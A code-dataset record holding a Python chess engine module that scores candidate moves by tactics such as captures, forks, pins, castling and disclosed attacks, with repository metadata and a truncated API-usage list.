{"api_name": "matplotlib.pyplot", "line_number": 334, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 335, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 335, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 336, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 336, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 337, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 337, "usage_type": "name"}, {"api_name": "utils.ml_utils.IMG_PATH", "line_number": 337, "usage_type": "name"}]} +{"seq_id": "2094413798", "text": "from operator import attrgetter\nimport copy\nfrom .values import *\nfrom .match import *\nfrom .move import *\nfrom .helper import reverse_lookup\nfrom .analyze_helper import *\nfrom .pieces.pawn import cPawn\nfrom .pieces.knight import cKnight\nfrom .pieces.bishop import cBishop\nfrom .pieces.rook import cRook\nfrom .pieces.king import cKing\nfrom .pieces.queen import cQueen\nfrom .pieces.piece import cTouch\nfrom .pieces.pieces_helper import obj_for_piece\nfrom .generator import cGenerator\n\n\ndef castles(gmove):\n match = gmove.match\n piece = match.readfield(gmove.srcx, gmove.srcy)\n if(piece == PIECES['wKg'] or piece == PIECES['bKg']):\n if(gmove.srcx - gmove.dstx == 2 or gmove.srcx - gmove.dstx == -2):\n return True\n\n\ndef promotes(gmove):\n if(gmove.prom_piece != PIECES['blk']):\n return True\n\n\ndef captures(gmove):\n match = gmove.match\n piece = match.readfield(gmove.srcx, gmove.srcy)\n color = match.color_of_piece(piece)\n dstpiece = match.readfield(gmove.dstx, gmove.dsty)\n if(dstpiece != PIECES['blk']):\n return True\n elif( (piece == PIECES['wPw'] or piece == PIECES['bPw']) and gmove.srcx != gmove.dstx ):\n return True\n else:\n return False\n\n\ndef defends_fork(gmove):\n match = gmove.match\n piece = match.readfield(gmove.srcx, gmove.srcy)\n match.do_move(gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty, gmove.prom_piece)\n cpiece = obj_for_piece(match, piece, gmove.dstx, gmove.dsty)\n if(cpiece):\n is_fork_defend = cpiece.defends_fork()\n else:\n is_fork_defend = False\n match.undo_move()\n return is_fork_defend\n\n\ndef threatens_fork(gmove):\n is_fork_threat = False\n match = gmove.match\n match.do_move(gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty, gmove.prom_piece)\n piece = match.readfield(gmove.dstx, gmove.dsty)\n cpiece = obj_for_piece(match, piece, gmove.dstx, gmove.dsty)\n if(cpiece):\n is_fork_threat = cpiece.threatens_fork()\n match.undo_move()\n return is_fork_threat\n\n\ndef flees(gmove):\n match = gmove.match\n lower_enmy_cnt_old = 0\n lower_enmy_cnt_new = 0\n piece = match.readfield(gmove.srcx, gmove.srcy)\n color = match.color_of_piece(piece)\n\n piece = match.readfield(gmove.srcx, gmove.srcy)\n if(piece == PIECES['wKg'] or piece == PIECES['bKg']):\n return False\n\n frdlytouches_old, enmytouches_old = list_all_field_touches(match, color, gmove.srcx, gmove.srcy)\n ###\n match.do_move(gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty, gmove.prom_piece)\n frdlytouches_new, enmytouches_new = list_all_field_touches(match, color, gmove.dstx, gmove.dsty)\n match.undo_move()\n ###\n\n if(len(enmytouches_old) > 0 and \n (len(frdlytouches_old) < len(frdlytouches_new))):\n return True\n\n if(len(enmytouches_old) > len(enmytouches_new)):\n return True\n\n for enmy in enmytouches_old:\n if(PIECES_RANK[enmy.piece] < PIECES_RANK[piece]):\n lower_enmy_cnt_old += 1\n for enmy in enmytouches_new:\n if(PIECES_RANK[enmy.piece] < PIECES_RANK[piece]):\n lower_enmy_cnt_new += 1\n if(lower_enmy_cnt_old > lower_enmy_cnt_new):\n return True\n else:\n return False\n\n\ndef find_attacks_and_supports_after_move(gmove):\n attacked = []\n supported = []\n match = gmove.match\n piece = match.readfield(gmove.srcx, gmove.srcy)\n ###\n match.do_move(gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty, gmove.prom_piece)\n cpiece = obj_for_piece(match, piece, gmove.dstx, gmove.dsty)\n if(cpiece):\n cpiece.find_attacks_and_supports(attacked, supported)\n \n if(cpiece.piece == PIECES['wKg'] or cpiece.piece == PIECES['bKg']):\n if(gmove.srcx - gmove.dstx == -2):\n crook = cRook(match, gmove.dstx - 1, gmove.dsty)\n crook.find_attacks_and_supports(attacked, supported)\n elif(gmove.srcx - gmove.dstx == 2):\n crook = cRook(match, gmove.dstx + 1, gmove.dsty)\n crook.find_attacks_and_supports(attacked, supported)\n match.undo_move()\n ###\n return attacked, supported\n\n\ndef find_attacks_on_and_supports_of_dstfield_after_move(gmove):\n match = gmove.match\n piece = match.readfield(gmove.srcx, gmove.srcy)\n match.do_move(gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty, gmove.prom_piece)\n frdlytouches, enmytouches = list_all_field_touches(match, match.color_of_piece(piece), gmove.dstx, gmove.dsty)\n match.undo_move()\n return frdlytouches, enmytouches\n\n\ndef does_unpin(gmove):\n match = gmove.match\n piece = match.readfield(gmove.srcx, gmove.srcy)\n color = match.color_of_piece(piece)\n pinlines_before = search_lines_of_pin(match, color, gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty)\n ###\n match.do_move(gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty, gmove.prom_piece)\n pinlines_after = search_lines_of_pin(match, color, gmove.dstx, gmove.dsty, None, None)\n match.undo_move()\n ###\n if(len(pinlines_after) < len(pinlines_before)):\n return True\n for pbefore in pinlines_before:\n identical = False\n for pafter in pinlines_after:\n if(pbefore[0].fieldx == pafter[0].fieldx and pbefore[0].fieldy == pafter[0].fieldy):\n identical = True\n if(identical == False):\n return True\n return False\n\n\ndef defends_check(match):\n if(match.next_color() == COLORS['white']):\n cking = cKing(match, match.board.wKg_x, match.board.wKg_y)\n else:\n cking = cKing(match, match.board.bKg_x, match.board.bKg_y)\n return cking.is_attacked()\n\n\ndef check_mates(gmove):\n match = gmove.match\n match.do_move(gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty, gmove.prom_piece)\n is_move_available = match.is_move_available()\n match.undo_move()\n return not is_move_available\n\n\ndef find_disclosed_pieces(match, srcx, srcy, dstx, dsty, discl_attacked, discl_supported):\n piece = match.readfield(srcx, srcy)\n color = match.color_of_piece(piece)\n idx = 0\n for step in cQueen.STEPS:\n if(idx % 2 == 0):\n first = cTouch(PIECES['blk'], 0, 0)\n second = cTouch(PIECES['blk'], 0, 0)\n if(idx < 4):\n cpiece = cRook\n excluded_dir = cRook.dir_for_move(srcx, srcy, dstx, dsty)\n faces = [PIECES['wRk'], PIECES['bRk'], PIECES['wQu'], PIECES['bQu']]\n else:\n cpiece = cBishop\n excluded_dir = cBishop.dir_for_move(srcx, srcy, dstx, dsty)\n faces = [PIECES['wBp'], PIECES['bBp'], PIECES['wQu'], PIECES['bQu']]\n idx += 1\n\n stepx = step[0]\n stepy = step[1]\n direction = cpiece.dir_for_move(srcx, srcy, (srcx + stepx), (srcy + stepy))\n if(direction == excluded_dir or direction == match.REVERSE_DIRS[excluded_dir]):\n break\n x1, y1 = match.search(srcx, srcy, stepx, stepy)\n if(x1 is not None):\n piece = match.readfield(x1, y1)\n if(first.piece == PIECES['blk']):\n first.piece = piece\n first.fieldx = x1\n first.fieldy = y1\n continue\n elif(second.piece == PIECES['blk']):\n second.piece = piece\n second.fieldx = x1\n second.fieldy = y1\n\n if(first.piece == PIECES['blk'] or second.piece == PIECES['blk']):\n continue\n \n if(match.color_of_piece(first.piece) != match.color_of_piece(second.piece)):\n if(match.color_of_piece(first.piece) == color):\n for face in faces:\n if(first.piece == face):\n discl_attacked.append(second)\n break\n else:\n for face in faces:\n if(second.piece == face):\n discl_attacked.append(first)\n break\n elif(match.color_of_piece(first.piece) == match.color_of_piece(second.piece)):\n if(match.color_of_piece(first.piece) == color):\n for face in faces:\n if(first.piece == face):\n discl_supported.append(second)\n break\n for face in faces:\n if(second.piece == face):\n discl_supported.append(first)\n break\n\ndef find_disclosures(match, gmove):\n discl_attacked = []\n discl_supported = []\n\n piece = match.readfield(gmove.srcx, gmove.srcy)\n color = match.color_of_piece(piece)\n\n match.do_move(gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty, gmove.prom_piece)\n find_disclosed_pieces(match, gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty, discl_attacked, discl_supported)\n match.undo_move()\n ###\n match.writefield(gmove.srcx, gmove.srcy, PIECES['blk'])\n\n for ctouch_beyond in discl_attacked:\n list_field_touches_beyond(match, color, ctouch_beyond)\n\n for ctouch_beyond in discl_supported:\n list_field_touches_beyond(match, color, ctouch_beyond)\n\n match.writefield(gmove.srcx, gmove.srcy, piece)\n ###\n \n return discl_attacked, discl_supported\n\n\ndef blocks(gmove):\n STEPS = [ [0, 1], [1, 0], [1, 1], [-1, 1] ]\n match = gmove.match\n piece = match.readfield(gmove.srcx, gmove.srcy)\n color = match.color_of_piece(piece)\n #frdlytouches_before_count = 0\n enmytouches_before_count = 0\n #frdlytouches_after_count = 0\n enmytouches_after_count = 0\n\n for step in STEPS:\n stepx = step[0]\n stepy = step[1]\n x1, y1, x2, y2 = match.search_bi_dirs(gmove.dstx, gmove.dsty, stepx, stepy)\n if(x1 is not None):\n if((x1 == gmove.srcx and y1 == gmove.srcy) or\n (x2 == gmove.srcx and y2 == gmove.srcy)):\n continue\n piece1 = match.readfield(x1, y1)\n piece2 = match.readfield(x2, y2)\n if(match.color_of_piece(piece1) == match.color_of_piece(piece2)):\n continue\n if(match.color_of_piece(piece1) == color):\n frdlytouches, enmytouches = list_all_field_touches(match, color, x1, y1)\n else:\n frdlytouches, enmytouches = list_all_field_touches(match, color, x2, y2)\n enmytouches_before_count += len(enmytouches)\n\n match.do_move(gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty, gmove.prom_piece)\n\n for step in STEPS:\n stepx = step[0]\n stepy = step[1]\n x1, y1, x2, y2 = match.search_bi_dirs(gmove.dstx, gmove.dsty, stepx, stepy)\n if(x1 is not None):\n if((x1 == gmove.srcx and y1 == gmove.srcy) or\n (x2 == gmove.srcx and y2 == gmove.srcy)):\n continue\n piece1 = match.readfield(x1, y1)\n piece2 = match.readfield(x2, y2)\n if(match.color_of_piece(piece1) == match.color_of_piece(piece2)):\n continue\n if(match.color_of_piece(piece1) == color):\n frdlytouches, enmytouches = list_all_field_touches(match, color, x1, y1)\n else:\n frdlytouches, enmytouches = list_all_field_touches(match, color, x2, y2)\n enmytouches_after_count += len(enmytouches)\n\n match.undo_move()\n\n if(enmytouches_after_count < enmytouches_before_count):\n return True\n else:\n return False\n\n\ndef running_pawn_in_endgame(gmove):\n if(gmove.match.is_endgame()):\n piece = gmove.match.readfield(gmove.srcx, gmove.srcy)\n if(piece == PIECES['wPw'] or piece == PIECES['bPw']):\n cpawn = cPawn(gmove.match, gmove.srcx, gmove.srcy)\n return cpawn.is_running()\n return False\n\n\ndef defends_invasion(match, gmove):\n piece = match.readfield(gmove.srcx, gmove.srcy)\n color = match.color_of_piece(piece)\n board = [[0] * 8 for i in range(8)]\n\n for y in range(8):\n for x in range(8):\n piece = match.readfield(x, y)\n if(match.color_of_piece(piece) == COLORS['white']):\n board[y][x] += 1\n elif(match.color_of_piece(piece) == COLORS['black']):\n board[y][x] -= 1\n \n return False\n\ndef controles_file(gmove):\n match = gmove.match\n piece = match.readfield(gmove.srcx, gmove.srcy)\n\n if(piece == PIECES['wBp'] or piece == PIECES['bBp']):\n cbishop = cBishop(match, gmove.srcx, gmove.srcy)\n return cbishop.move_controles_file(gmove.dstx, gmove.dsty)\n elif(piece == PIECES['wRk'] or piece == PIECES['bRk']):\n crook = cRook(match, gmove.srcx, gmove.srcy)\n return crook.move_controles_file(gmove.dstx, gmove.dsty)\n elif(piece == PIECES['wQu'] or piece == PIECES['bQu']):\n cqueen = cQueen(match, gmove.srcx, gmove.srcy)\n return cqueen.move_controles_file(gmove.dstx, gmove.dsty)\n else:\n return False\n\ndef is_tactical_draw(gmove):\n newmatch = copy.deepcopy(gmove.match)\n newmatch.do_move(gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty, gmove.prom_piece)\n\n #if(newmatch.board.fifty_moves_count >= 49):\n #return True\n\n if(len(newmatch.move_list) < 9):\n return False\n\n boards = []\n for i in range(9):\n str_board = \"\"\n for y in range(8):\n for x in range(8):\n piece = newmatch.readfield(x, y)\n str_board += reverse_lookup(PIECES, piece)\n boards.append(str_board)\n newmatch.undo_move()\n\n count = 0\n str_board = boards[0]\n for i in range(1, 9):\n if(boards[i] == str_board):\n count += 1\n\n return count >= 2\n\n\ndef is_progress(gmove):\n match = gmove.match\n if(match.is_opening()):\n piece = match.readfield(gmove.srcx, gmove.srcy)\n if(piece == PIECES['wPw']):\n if(gmove.srcy == match.board.COORD['2'] and \n gmove.srcx >= match.board.COORD['3'] and gmove.srcx <= match.board.COORD['6']):\n return True\n elif(piece == PIECES['bPw']):\n if(gmove.srcy == match.board.COORD['7'] and \n gmove.srcx >= match.board.COORD['3'] and gmove.srcx <= match.board.COORD['6']):\n return True\n elif(piece == PIECES['wKn']):\n if(gmove.srcy == match.board.COORD['1'] and \n (gmove.srcx == match.board.COORD['2'] or gmove.srcx == match.board.COORD['7'])):\n return True\n elif(piece == PIECES['bKn']):\n if(gmove.srcy == match.board.COORD['8'] and \n (gmove.srcx == match.board.COORD['2'] or gmove.srcx == match.board.COORD['7'])):\n return True\n elif(piece == PIECES['wBp']):\n if(gmove.srcy == match.board.COORD['1'] and \n (gmove.srcx == match.board.COORD['3'] or gmove.srcx == match.board.COORD['6'])):\n return True\n elif(piece == PIECES['bBp']):\n if(gmove.srcy == match.board.COORD['8'] and \n (gmove.srcx == match.board.COORD['3'] or gmove.srcx == match.board.COORD['6'])):\n return True\n return False\n else:\n return False\n\n\ndef rank_gmoves(match, priomoves, piecescnt, last_pmove, dbggmove, dbgprio):\n all_attacking = []\n all_supporting = []\n all_fork_defending = []\n all_discl_attacking = []\n all_discl_supporting = []\n all_fleeing = []\n all_running = []\n excludes = []\n\n for priomove in priomoves:\n gmove = priomove.gmove\n from_dstfield_attacked, from_dstfield_supported = find_attacks_and_supports_after_move(gmove)\n frdlytouches_on_dstfield, enmytouches_on_dstfield = find_attacks_on_and_supports_of_dstfield_after_move(gmove)\n discl_attacked, discl_supported = find_disclosures(match, gmove)\n\n if(len(frdlytouches_on_dstfield) >= len(enmytouches_on_dstfield) and \n is_piece_lfe_attacker_on_dstfield(gmove, enmytouches_on_dstfield) and \n match.is_soft_pin(gmove.srcx, gmove.srcy)[0] == False):\n subtactic = priomove.SUB_TACTICS['good-deal']\n else:\n subtactic = priomove.SUB_TACTICS['bad-deal']\n\n if(defends_check(match)):\n if(subtactic == priomove.SUB_TACTICS['good-deal'] and\n match.is_soft_pin(gmove.srcx, gmove.srcy)[0] == False):\n priomove.tactics.append(cTactic(priomove.TACTICS['defends-check'], priomove.SUB_TACTICS['good-deal']))\n else:\n priomove.tactics.append(cTactic(priomove.TACTICS['defends-check'], priomove.SUB_TACTICS['bad-deal']))\n\n if(castles(gmove)):\n match.do_move(gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty, gmove.prom_piece)\n cking = cKing(match, gmove.dstx, gmove.dsty)\n is_king_safe = cking.is_safe()\n match.undo_move()\n if(is_king_safe):\n priomove.tactics.append(cTactic(priomove.TACTICS['castles'], priomove.SUB_TACTICS['good-deal']))\n else:\n priomove.tactics.append(cTactic(priomove.TACTICS['castles'], priomove.SUB_TACTICS['bad-deal']))\n\n if(is_tactical_draw(gmove)):\n priomove.tactics.append(cTactic(priomove.TACTICS['is-tactical-draw'], priomove.SUB_TACTICS['neutral']))\n\n if(promotes(gmove)):\n priomove.tactics.append(cTactic(priomove.TACTICS['promotes'], subtactic))\n\n if(captures(gmove)):\n if(subtactic == priomove.SUB_TACTICS['good-deal'] or\n is_piece_lfe_captured(gmove)):\n if(is_captured_pinned_or_soft_pinned(gmove)):\n priomove.tactics.append(cTactic(priomove.TACTICS['captures'], priomove.SUB_TACTICS['stormy']))\n else:\n priomove.tactics.append(cTactic(priomove.TACTICS['captures'], priomove.SUB_TACTICS['good-deal']))\n else:\n priomove.tactics.append(cTactic(priomove.TACTICS['captures'], subtactic))\n\n if(does_unpin(gmove)):\n priomove.tactics.append(cTactic(priomove.TACTICS['unpins'], subtactic))\n\n if(defends_fork(gmove)):\n priomove.tactics.append(cTactic(priomove.TACTICS['defends-fork'], subtactic))\n all_fork_defending.append(priomove)\n\n if(is_fork_move(gmove, from_dstfield_attacked)):\n priomove.tactics.append(cTactic(priomove.TACTICS['forks'], subtactic))\n\n if(threatens_fork(gmove)):\n priomove.tactics.append(cTactic(priomove.TACTICS['threatens-fork'], subtactic))\n\n if(flees(gmove)):\n if(subtactic == priomove.SUB_TACTICS['good-deal']):\n piece = match.readfield(gmove.srcx, gmove.srcy)\n friends, enemies = list_all_field_touches(match, match.color_of_piece(piece), gmove.srcx, gmove.srcy)\n if(len(friends) < len(enemies) or\n is_piece_le_attacker_on_srcfield(gmove, enemies) == False):\n priomove.tactics.append(cTactic(priomove.TACTICS['flees'], priomove.SUB_TACTICS['urgent']))\n elif(len(friends) == 0):\n priomove.tactics.append(cTactic(priomove.TACTICS['flees'], priomove.SUB_TACTICS['neutral']))\n all_fleeing.append(priomove)\n\n if(len(from_dstfield_attacked) > 0):\n attack_subtactic = subtactic\n if(attack_subtactic == priomove.SUB_TACTICS['bad-deal']):\n if(is_piece_lower_attacker_on_dstfield(gmove, enmytouches_on_dstfield) and \n len(frdlytouches_on_dstfield) > 0):\n attack_subtactic = priomove.SUB_TACTICS['good-deal']\n\n for attacked in from_dstfield_attacked:\n if(attacked.piece == PIECES['wKg'] or \n attacked.piece == PIECES['bKg']):\n if(check_mates(gmove)):\n priomove.tactics.append(cTactic(priomove.TACTICS['attacks-king'], priomove.SUB_TACTICS['urgent']))\n else:\n priomove.tactics.append(cTactic(priomove.TACTICS['attacks-king'], attack_subtactic))\n elif(subtactic == priomove.SUB_TACTICS['good-deal'] and \n is_attacked_soft_pinned(gmove, attacked)):\n priomove.tactics.append(cTactic(priomove.TACTICS['attacks'], priomove.SUB_TACTICS['stormy']))\n else:\n priomove.tactics.append(cTactic(priomove.TACTICS['attacks'], attack_subtactic))\n all_attacking.append(priomove)\n\n if(len(from_dstfield_supported) > 0):\n if(subtactic == priomove.SUB_TACTICS['good-deal'] and \n is_supported_le_attacker(from_dstfield_supported)):\n support_subtactic = priomove.SUB_TACTICS['good-deal']\n else:\n support_subtactic = priomove.SUB_TACTICS['bad-deal']\n\n for supported in from_dstfield_supported:\n if(is_supported_running_pawn(match, supported)):\n support_tactic = priomove.TACTICS['supports-running-pawn']\n elif(len(supported.attacker_beyond) > 0):\n support_tactic = priomove.TACTICS['supports']\n else:\n support_tactic = priomove.TACTICS['supports-unattacked']\n\n if(support_subtactic == priomove.SUB_TACTICS['good-deal'] and \n len(supported.attacker_beyond) > 0 and\n (is_supporter_lower_attacker(gmove, supported) or\n match.is_soft_pin(supported.fieldx, supported.fieldy)[0])):\n support_subtactic = priomove.SUB_TACTICS['urgent']\n\n priomove.tactics.append(cTactic(support_tactic, support_subtactic))\n all_supporting.append(priomove)\n\n if(len(discl_attacked) > 0):\n if(is_discl_attacked_supported(discl_attacked) == False):\n priomove.tactics.append(cTactic(priomove.TACTICS['attacks'], priomove.SUB_TACTICS['good-deal']))\n else:\n priomove.tactics.append(cTactic(priomove.TACTICS['attacks'], priomove.SUB_TACTICS['bad-deal']))\n all_discl_attacking.append(priomove)\n\n if(len(discl_supported) > 0):\n if(is_discl_supported_weak(discl_supported)):\n priomove.tactics.append(cTactic(priomove.TACTICS['supports'], priomove.SUB_TACTICS['good-deal']))\n else:\n priomove.tactics.append(cTactic(priomove.TACTICS['supports'], priomove.SUB_TACTICS['bad-deal']))\n all_discl_supporting.append(priomove)\n\n if(blocks(gmove)):\n block_subtactic = subtactic\n if(block_subtactic == priomove.SUB_TACTICS['bad-deal']):\n if(is_piece_lower_attacker_on_dstfield(gmove, enmytouches_on_dstfield) and \n len(frdlytouches_on_dstfield) > 0):\n block_subtactic = priomove.SUB_TACTICS['good-deal']\n priomove.tactics.append(cTactic(priomove.TACTICS['blocks'], block_subtactic))\n\n if(running_pawn_in_endgame(gmove)):\n if(len(frdlytouches_on_dstfield) >= len(enmytouches_on_dstfield)):\n priomove.tactics.append(cTactic(priomove.TACTICS['is-running-pawn'], priomove.SUB_TACTICS['good-deal']))\n else:\n priomove.tactics.append(cTactic(priomove.TACTICS['is-running-pawn'], priomove.SUB_TACTICS['bad-deal']))\n all_running.append(priomove)\n\n if(controles_file(priomove.gmove)):\n priomove.tactics.append(cTactic(priomove.TACTICS['controles-file'], subtactic))\n\n if(is_progress(gmove)):\n priomove.tactics.append(cTactic(priomove.TACTICS['is-progress'], priomove.SUB_TACTICS['neutral']))\n\n if(len(priomove.tactics) > 0):\n piece = match.readfield(gmove.srcx, gmove.srcy)\n priomove.evaluate_priorities(piece)\n\n all_attacking.sort(key=attrgetter('prio'))\n for pmove in all_attacking:\n if(any(e[0] == pmove.gmove.srcx and e[1] == pmove.gmove.srcy for e in excludes) == False):\n excludes.append([pmove.gmove.srcx, pmove.gmove.srcy])\n else:\n pmove.downgrade(priomove.TACTICS['attacks'])\n piece = match.readfield(pmove.gmove.srcx, pmove.gmove.srcy)\n pmove.evaluate_priorities(piece)\n\n excludes.clear()\n all_discl_attacking.sort(key=attrgetter('prio'))\n for pmove in all_discl_attacking:\n if(any(e[0] == pmove.gmove.srcx and e[1] == pmove.gmove.srcy for e in excludes) == False):\n excludes.append([pmove.gmove.srcx, pmove.gmove.srcy])\n else:\n pmove.downgrade(pmove.TACTICS['attacks'])\n piece = match.readfield(pmove.gmove.srcx, pmove.gmove.srcy)\n pmove.evaluate_priorities(piece)\n\n excludes.clear()\n all_supporting.sort(key=attrgetter('prio'))\n for pmove in all_supporting:\n if(any(e[0] == pmove.gmove.srcx and e[1] == pmove.gmove.srcy for e in excludes) == False):\n excludes.append([pmove.gmove.srcx, pmove.gmove.srcy])\n else:\n pmove.downgrade(pmove.TACTICS['supports'])\n piece = match.readfield(pmove.gmove.srcx, pmove.gmove.srcy)\n pmove.evaluate_priorities(piece)\n\n excludes.clear()\n all_discl_supporting.sort(key=attrgetter('prio'))\n for pmove in all_discl_supporting:\n if(any(e[0] == pmove.gmove.srcx and e[1] == pmove.gmove.srcy for e in excludes) == False):\n excludes.append([pmove.gmove.srcx, pmove.gmove.srcy])\n else:\n pmove.downgrade(pmove.TACTICS['supports'])\n piece = match.readfield(pmove.gmove.srcx, pmove.gmove.srcy)\n pmove.evaluate_priorities(piece)\n\n excludes.clear()\n all_fork_defending.sort(key=attrgetter('prio'))\n for pmove in all_fork_defending:\n if(any(e[0] == pmove.gmove.srcx and e[1] == pmove.gmove.srcy for e in excludes) == False):\n excludes.append([pmove.gmove.srcx, pmove.gmove.srcy])\n else:\n pmove.downgrade(pmove.TACTICS['defends-fork'])\n piece = match.readfield(pmove.gmove.srcx, pmove.gmove.srcy)\n pmove.evaluate_priorities(piece)\n\n excludes.clear()\n all_fleeing.sort(key=attrgetter('prio'))\n for pmove in all_fleeing:\n if(any(e[0] == pmove.gmove.srcx and e[1] == pmove.gmove.srcy for e in excludes) == False):\n excludes.append([pmove.gmove.srcx, pmove.gmove.srcy])\n else:\n pmove.downgrade(pmove.TACTICS['flees'])\n piece = match.readfield(pmove.gmove.srcx, pmove.gmove.srcy)\n pmove.evaluate_priorities(piece)\n\n \"\"\"excludes.clear()\n all_running.sort(key=attrgetter('prio'))\n for pmove in all_running:\n if(any(e[0] == pmove.gmove.srcx and e[1] == pmove.gmove.srcy for e in excludes) == False):\n excludes.append([pmove.gmove.srcx, pmove.gmove.srcy])\n else:\n pmove.downgrade(pmove.TACTICS['is-running-pawn'])\n pmove.evaluate_priorities()\"\"\"\n\n if(dbggmove):\n for priomove in priomoves:\n if(priomove.gmove.srcx == dbggmove.srcx and \n priomove.gmove.srcy == dbggmove.srcy and \n priomove.gmove.dstx == dbggmove.dstx and \n priomove.gmove.dsty == dbggmove.dsty):\n priomove.prio = dbgprio\n break\n priomoves.sort(key=attrgetter('prio'))\n", "repo_name": "richardtraindl/immanuel", "sub_path": "kate/engine/analyze_move.py", "file_name": "analyze_move.py", "file_ext": "py", "file_size_in_byte": 27269, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "match.readfield", "line_number": 21, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 34, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 35, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 36, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 47, "usage_type": "call"}, {"api_name": "match.do_move", "line_number": 48, "usage_type": "call"}, {"api_name": "pieces.pieces_helper.obj_for_piece", "line_number": 49, "usage_type": "call"}, {"api_name": "match.undo_move", "line_number": 54, "usage_type": "call"}, {"api_name": "match.do_move", "line_number": 61, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 62, "usage_type": "call"}, {"api_name": "pieces.pieces_helper.obj_for_piece", "line_number": 63, "usage_type": "call"}, {"api_name": "match.undo_move", "line_number": 66, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 74, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 75, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 77, "usage_type": "call"}, {"api_name": "match.do_move", "line_number": 83, "usage_type": "call"}, {"api_name": "match.undo_move", "line_number": 85, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 111, "usage_type": "call"}, {"api_name": "match.do_move", "line_number": 113, "usage_type": "call"}, {"api_name": "pieces.pieces_helper.obj_for_piece", "line_number": 114, "usage_type": "call"}, {"api_name": "pieces.rook.cRook", "line_number": 120, "usage_type": "call"}, {"api_name": "pieces.rook.cRook", "line_number": 123, "usage_type": "call"}, {"api_name": "match.undo_move", "line_number": 125, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 132, "usage_type": "call"}, {"api_name": "match.do_move", "line_number": 133, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 134, "usage_type": "call"}, {"api_name": "match.undo_move", "line_number": 135, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 141, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 142, "usage_type": "call"}, {"api_name": "match.do_move", "line_number": 145, "usage_type": "call"}, {"api_name": "match.undo_move", "line_number": 147, "usage_type": "call"}, {"api_name": "match.next_color", "line_number": 162, "usage_type": "call"}, {"api_name": "pieces.king.cKing", "line_number": 163, "usage_type": "call"}, {"api_name": "match.board", "line_number": 163, "usage_type": "attribute"}, {"api_name": "pieces.king.cKing", "line_number": 165, "usage_type": "call"}, {"api_name": "match.board", "line_number": 165, "usage_type": "attribute"}, {"api_name": "match.do_move", "line_number": 171, "usage_type": "call"}, {"api_name": "match.is_move_available", "line_number": 172, "usage_type": "call"}, {"api_name": "match.undo_move", "line_number": 173, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 178, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 179, "usage_type": "call"}, {"api_name": "pieces.queen.cQueen.STEPS", "line_number": 181, "usage_type": "attribute"}, {"api_name": "pieces.queen.cQueen", "line_number": 181, "usage_type": "name"}, {"api_name": "pieces.piece.cTouch", "line_number": 183, "usage_type": "call"}, {"api_name": "pieces.piece.cTouch", "line_number": 184, "usage_type": "call"}, {"api_name": "pieces.rook.cRook", "line_number": 186, "usage_type": "name"}, {"api_name": "pieces.rook.cRook.dir_for_move", "line_number": 187, "usage_type": "call"}, {"api_name": "pieces.rook.cRook", "line_number": 187, "usage_type": "name"}, {"api_name": "pieces.bishop.cBishop", "line_number": 190, "usage_type": "name"}, {"api_name": "pieces.bishop.cBishop.dir_for_move", "line_number": 191, "usage_type": "call"}, {"api_name": "pieces.bishop.cBishop", "line_number": 191, "usage_type": "name"}, {"api_name": "match.REVERSE_DIRS", "line_number": 198, "usage_type": "attribute"}, {"api_name": "match.search", "line_number": 200, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 202, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 216, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 217, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 227, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 228, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 242, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 243, "usage_type": "call"}, {"api_name": "match.do_move", "line_number": 245, "usage_type": "call"}, {"api_name": "match.undo_move", "line_number": 247, "usage_type": "call"}, {"api_name": "match.writefield", "line_number": 249, "usage_type": "call"}, {"api_name": "match.writefield", "line_number": 257, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 266, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 267, "usage_type": "call"}, {"api_name": "match.search_bi_dirs", "line_number": 276, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 281, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 282, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 283, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 285, "usage_type": "call"}, {"api_name": "match.do_move", "line_number": 291, "usage_type": "call"}, {"api_name": "match.search_bi_dirs", "line_number": 296, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 301, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 302, 